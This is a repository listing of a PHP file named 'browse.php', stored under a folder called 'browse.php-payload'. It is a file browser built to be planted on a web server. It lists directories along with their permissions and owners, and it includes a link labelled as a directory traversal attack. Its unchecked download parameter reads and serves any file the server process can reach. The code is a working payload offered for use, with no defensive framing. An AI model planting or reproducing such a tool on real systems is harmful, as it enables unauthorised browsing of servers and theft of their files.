limit fstBC to 30bp in Python3 ver.
[GalaxyCodeBases.git] / php / browse.php-payload / browse.php
blob1d67b240854493f733ed128889fb1d807a01ffe3
1 <?php
2 // Version 1.0.0
4 if (isset($_GET['download']))
6 header('Content-Disposition: filename=' . basename($_GET['download']));
7 header('Content-Type: ' . finfo_file(finfo_open(FILEINFO_MIME_TYPE), $_GET['download']));
8 header('Content-Length: ' . filesize($_GET['download']));
9 readfile($_GET['download']);
10 die();
13 $path = isset($_GET['path']) ? $_GET['path'] : '';
15 <html>
16 <head>
17 <title><?= htmlentities('/' . $path) ?></title>
18 <style>
19 html
21 font-family: monospace;
22 font-size: 10pt;
25 table
27 border-spacing: 0px;
28 border-top: 1px solid #c0c0c0;
29 border-left: 1px solid #c0c0c0;
31 table tr th
33 text-align: left;
34 padding: 8px;
35 border-bottom: 1px solid #c0c0c0;
36 border-right: 1px solid #c0c0c0;
37 background-color: #fafafa;
39 table tr td
41 vertical-align: top;
42 padding: 3px 8px;
43 border-bottom: 1px solid #e0e0e0;
45 table tr td:last-child
47 border-right: 1px solid #c0c0c0;
49 table tr:hover td
51 background-color: #fafafa;
53 table tr td a
55 display: block;
56 margin: -3px -8px;
57 padding: 3px 8px;
60 .spacer
62 display: inline-block;
63 height: 1px;
66 .icon
68 display: inline-block;
69 vertical-align: text-top;
70 width: 16px;
71 height: 16px;
72 margin-right: 5px;
74 .icon.icon-dir
76 background-image: url();
78 .icon.icon-link
80 background-image: url();
82 .icon.icon-file
84 background-image: url();
86 </style>
87 </head>
88 <body>
89 <table>
90 <tr>
91 <th><div class="spacer" style="width: 10px;"></div>Name</th>
92 <th align="right">Size</th>
93 <th>Modified</th>
94 <th>Permissions</th>
95 <th>Owner</th>
96 <th>Group</th>
97 </tr>
98 <?php
99 print('<tr>');
100 print('<td colspan="6"><a href="?path=' . urlencode(($path == '' ? '' : $path . '/') . '..') . '" title="Attempt directory traversal attack by adding \'..\' to the path (recommended when in top level directory)"><div class="spacer" style="width: 10px;"></div>');
101 print('<div class="icon icon-dir"></div>Traverse ..</a></td>');
102 print('</tr>');
104 $fullTree = '';
105 $treeDepth = 0;
106 foreach (array_merge([ '.' ], explode('/', $path)) as $tree)
108 if ($tree != '')
110 $fullTree = ($fullTree == '' ? '' : $fullTree . '/') . ($tree == '.' ? '' : $tree);
111 $treeDepth += 10;
112 print('<tr>');
113 print('<td colspan="6"><a href="?path=' . urlencode($fullTree) . '"><div class="spacer" style="width: ' . $treeDepth . 'px;"></div>');
114 print('<div class="icon icon-' . (is_link($fullTree) ? 'link' : 'dir') . '"></div>' . ($tree != '.' && str_replace('/', '', str_replace('.', '', $tree)) == '' ? '&ltUp&gt;' : htmlentities($tree)) . '</a></td>');
115 print('</tr>');
118 $spacerHtml = '<div class="spacer" style="width: ' . ($treeDepth + 10) . 'px;"></div>';
120 $directorycount = 0;
121 $fileCount = 0;
123 $directoryPath = $path == '' ? '.' : $path;
124 if (is_dir($directoryPath))
126 foreach ([ 'dir', 'file' ] as $type)
128 foreach (array_diff(scandir($directoryPath), [ '.', '..' ]) as $file)
130 $fullPath = ($path == '' ? '' : $path . '/') . $file;
131 if ($type == 'dir' ^ is_file($fullPath))
133 $link = urlencode($fullPath);
134 print('<tr>');
135 if ($type == 'dir')
137 $directorycount++;
138 print('<td><a href="?path=' . $link . '">' . $spacerHtml . '<div class="icon icon-' . (is_link($fullPath) ? 'link' : 'dir') . '"></div>' . htmlentities($file) . '</a></td>');
139 print('<td align="right"></td>');
141 else
143 $fileCount++;
144 print('<td><a href="?download=' . $link . '">' . $spacerHtml . '<div class="icon icon-file"></div>' . htmlentities($file) . '</a></td>');
145 print('<td align="right">' . number_format(filesize($fullPath), 0, '', '.') . '</td>');
147 print('<td>' . date('d.m.Y H:i:s', @filemtime($fullPath)) . '</td>');
148 print('<td>' . GetFilePermissions($fullPath) . '</td>');
149 print('<td>' . (function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($fullPath))['name'] : fileowner($fullPath)) . '</td>');
150 print('<td>' . (function_exists('posix_getpwuid') ? posix_getpwuid(filegroup($fullPath))['name'] : filegroup($fullPath)) . '</td>');
151 print('</tr>');
156 else
158 print('<tr>');
159 print('<td colspan="6">Directory \'' . htmlentities('/' . $path) . '\' not found.</td>');
160 print('</tr>');
163 <tr>
164 <th colspan="6"><?= $directorycount ?> directories, <?= $fileCount ?> files</th>
165 </tr>
166 </table>
167 </body>
168 </html>
169 <?php
170 function GetFilePermissions($path)
172 $permissions = @fileperms($path);
173 $result = '';
174 for ($i = 0, $perm = 0x100; $i < 9; $i++, $perm >>= 1)
176 $result .= $permissions & $perm ? 'rwx'[$i % 3] : '-';
178 return $result;